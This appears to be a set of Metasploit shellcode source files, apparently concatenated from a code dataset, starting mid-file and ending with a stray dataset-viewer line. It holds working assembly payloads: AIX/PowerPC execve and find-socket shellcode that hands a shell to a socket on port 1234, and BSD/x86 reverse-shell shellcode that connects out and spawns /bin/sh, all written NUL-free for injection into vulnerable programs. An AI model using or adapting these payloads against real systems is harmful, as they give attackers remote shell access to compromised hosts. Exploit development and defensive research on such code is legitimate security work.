stu %r25,-4(%r1)                # socketcall arg block: addrlen = 16
stu %r21,-4(%r1)                # &sockaddr
stu %r26,-4(%r1)                # fd
mr %r4,%r1
cal %r3,__NC_connect(%r29)
cal %r0,__NC_socketcall(%r29)
.long 0x44ffff02                # sc
0:
# dup2(sock, fd) for fd = 2,1,0
mr %r4,%r27
mr %r3,%r26
cal %r0,__NC_dup2(%r29)
.long 0x44ffff02                # sc
ai. %r27,%r27,-1
bge 0b
shellcode:
# execve("/bin/sh", {path, NULL}, 0)
# lil %r31,__CAL
xor. %r5,%r5,%r5                # r5 = 0; sets cr0 so bnel falls through...
bnel shellcode                  # ...but LK=1 still writes LR = next addr (getpc)
mflr %r30
cal %r30,511(%r30)
cal %r3,-511+36(%r30)           # r3 -> "/bin/sh" (36 bytes past the bnel)
stb %r5,-511+43(%r30)           # ensure the string is NUL-terminated
stu %r5,-4(%r1)                 # argv[1] = NULL
stu %r3,-4(%r1)                 # argv[0] = path
mr %r4,%r1                      # r4 = argv
# cal %r0,__NC_execve(%r31)
cal %r0,__NC_execve(%r29)
.long 0x44ffff02                # sc
.asciz "/bin/sh"
|
OpenWireSec/metasploit | 1,605 | external/source/unixasm/aix-power-shellcode.S | /*
* aix-power-shellcode.S
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
/*
* Supported AIX versions:
*
* -DAIX614 AIX Version 6.1.4
* -DAIX613 AIX Version 6.1.3
* -DAIX612 AIX Version 6.1.2
* -DAIX611 AIX Version 6.1.1
* -DAIX5310 AIX Version 5.3.10
* -DAIX539 AIX Version 5.3.9
* -DAIX538 AIX Version 5.3.8
* -DAIX537 AIX Version 5.3.7
*
*/
#include "aix-power.h"
.globl .main
.csect .text[PR]
.main:
# AIX/PowerPC execve shellcode: exec /bin/csh.  __CAL and __NC_execve
# come from aix-power.h (syscall numbers vary by AIX level).
shellcode:
lil %r29,__CAL
xor. %r5,%r5,%r5                # r5 = 0; sets cr0 so bnel is not taken...
bnel shellcode                  # ...but LK=1 still writes LR = next addr (getpc)
mflr %r30
cal %r30,511(%r30)
cal %r3,-511+40(%r30)           # r3 -> "/bin/csh" (40 bytes past the bnel)
stb %r5,-511+48(%r30)           # ensure the string is NUL-terminated
stu %r5,-4(%r1)                 # argv[1] = NULL
stu %r3,-4(%r1)                 # argv[0] = path
mr %r4,%r1                      # r4 = argv (r5 = 0 = envp)
cal %r2,__NC_execve(%r29)       # AIX passes the syscall number in r2
crorc %cr6,%cr6,%cr6
.long 0x44ffff02                # raw-encoded system-call instruction
.asciz "/bin/csh"
|
OpenWireSec/metasploit | 2,828 | external/source/unixasm/aix-power-fndsockcode64.S | /*
* $Id: aix-power-fndsockcode64.S 40 2008-11-17 02:45:30Z ramon $
*
* aix-power-fndsockcode64.S - AIX Power Find socket code
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
/*
* Compile with the following command.
* $ gcc -Wall -DAIXLEVEL -m64 -o aix-power-fndsockcode64
* aix-power-fndsockcode64.S
*
* Where AIXLEVEL is one of the currently supported AIX levels.
* -DV530 AIX 5.3.0
*
*/
#include "aix-power.h"
.globl .main
.csect .text[PR]
.main:
# AIX/PowerPC 64-bit "find socket" shellcode: scan file descriptors
# with getpeername until the peer port is 1234, duplicate the socket
# onto fds 0-2, then exec /bin/csh.  Syscall numbers (__NC_*) come from
# aix-power.h; __CAL lets small immediates be built NUL-free with cal.
syscallcode:
xor. %r31,%r31,%r31             # r31 = 0; sets cr0 so bnel is not taken...
bnel syscallcode                # ...but LK=1 still writes LR = next addr (getpc)
mflr %r30
cal %r30,511(%r30)
cal %r30,-511+28(%r30)          # r30 = pc+28 -> the "cal %r30,-8(%r30)" below
mtctr %r30
bctr                            # skip over the syscall stub
crorc %cr6,%cr6,%cr6            # syscall stub: crorc (AIX linkage) ...
.long 0x44ffff02                # ... plus the raw-encoded system-call insn
cal %r30,-8(%r30)               # r30 -> syscall stub
fndsockcode:
lil %r29,__CAL
# getpeername(fd, &name, &namelen) for fd = 1,2,3,...; the name buffer
# and the namelen word (initialised to 44) live on the stack.
stu %r31,-4(%r1)
mr %r28,%r1                     # r28 = &name buffer
cal %r27,-511+44(%r29)
stu %r27,-4(%r1)
mr %r27,%r1                     # r27 = &namelen
0:
cal %r31,511(%r31)
cal %r31,-511+1(%r31)           # fd++ (NUL-free increment)
mr %r5,%r27
mr %r4,%r28
mr %r3,%r31
cal %r2,__NC_getpeername(%r29)
mtctr %r30
bctrl
cal %r26,511(%r28)
lhz %r26,-511+2(%r26)           # load sockaddr_in.sin_port from the name buffer
cmpli 0,%r26,1234               # attacker's peer port?
bne 0b
# For fd = 2,1,0: close(fd), then kfcntl(sock, F_DUPFD=0, fd) --
# duplicating to the lowest free descriptor >= fd emulates dup2.
# close
cal %r25,-511+2(%r29)
1:
mr %r3,%r25
cal %r2,__NC_close(%r29)
mtctr %r30
bctrl
# kfcntl
mr %r5,%r25
xor %r4,%r4,%r4
mr %r3,%r31                     # r31 = the found socket fd
cal %r2,__NC_kfcntl(%r29)
mtctr %r30
bctrl
ai. %r25,%r25,-1
bge 1b
shellcode64:
# execve("/bin/csh", {path, NULL}, 0) using 64-bit stack pushes (stdu)
# lil %r31,__CAL
xor. %r5,%r5,%r5
bnel shellcode64                # not taken; LR = next addr (getpc for the string)
# mflr %r30
# cal %r30,511(%r30)
# cal %r3,-511+40(%r30)
# stb %r5,-511+48(%r30)
mflr %r24
cal %r24,511(%r24)
cal %r3,-511+40(%r24)           # r3 -> "/bin/csh" (40 bytes past the bnel)
stb %r5,-511+48(%r24)           # ensure the string is NUL-terminated
stdu %r5,-8(%r1)                # argv[1] = NULL
stdu %r3,-8(%r1)                # argv[0] = path
mr %r4,%r1                      # r4 = argv
# cal %r2,__NC_execve(%r31)
cal %r2,__NC_execve(%r29)
# crorc %cr6,%cr6,%cr6
# .long 0x44ffff02
mtctr %r30
bctrl
.asciz "/bin/csh"
|
OpenWireSec/metasploit | 1,566 | external/source/unixasm/bsd-x86-cntsockcode.s | /*
* bsd-x86-cntsockcode.s
* Copyright 2004 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
.global _start
_start:
# 64 bytes
# BSD/x86 reverse-shell shellcode: connect to 127.0.0.1:1234, dup2 the
# socket onto low fds, then exec a shell.  BSD int $0x80 syscalls take
# their arguments on the stack above a (dummy) return-address slot, so
# each call site pushes args right-to-left plus one filler word.
cntsockcode:
pushl $0x0100007f               # sockaddr_in (backwards): sin_addr = 127.0.0.1
pushl $0xd20402ff               # sin_port = 0x04d2 (1234), family = 2, len = 0xff
movl %esp,%edi                  # edi -> sockaddr_in
xorl %eax,%eax
pushl %eax                      # protocol = 0      (arg 3)
pushl $0x01                     # SOCK_STREAM       (arg 2)
pushl $0x02                     # PF_INET           (arg 1)
pushl $0x10                     # dummy ret slot; reused as connect's addrlen
movb $0x61,%al                  # SYS_socket = 97
int $0x80
pushl %edi                      # &sockaddr         (arg 2)
pushl %eax                      # socket fd         (arg 1)
pushl %eax                      # dummy return-address slot
pushl $0x62                     # SYS_connect = 98
popl %eax
int $0x80                       # connect(fd, &sockaddr, 0x10)
pushl %eax
0:
# dup2(fd, n): the target fd lives in the stack slot at -0x18(%edi)
# (initially the socket fd) and is decremented each pass down to 0.
pushl $0x5a                     # SYS_dup2 = 90
popl %eax
int $0x80
decl -0x18(%edi)
jns 0b
shellcode:
# execve("/bin//sh", argv, NULL) -- SYS_execve = 59; relies on eax = 0
# from the final dup2 return instead of re-zeroing it.
# xorl %eax,%eax
# pushl %eax
pushl $0x68732f2f               # "//sh"
pushl $0x6e69622f               # "/bin"
movl %esp,%ebx                  # ebx -> "/bin//sh"
pushl %eax                      # NULL: serves as both envp and argv's contents
pushl %esp                      # argv -> the NULL just pushed
pushl %ebx                      # path (arg 1)
pushl %eax                      # dummy return-address slot
movb $0x3b,%al
int $0x80
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.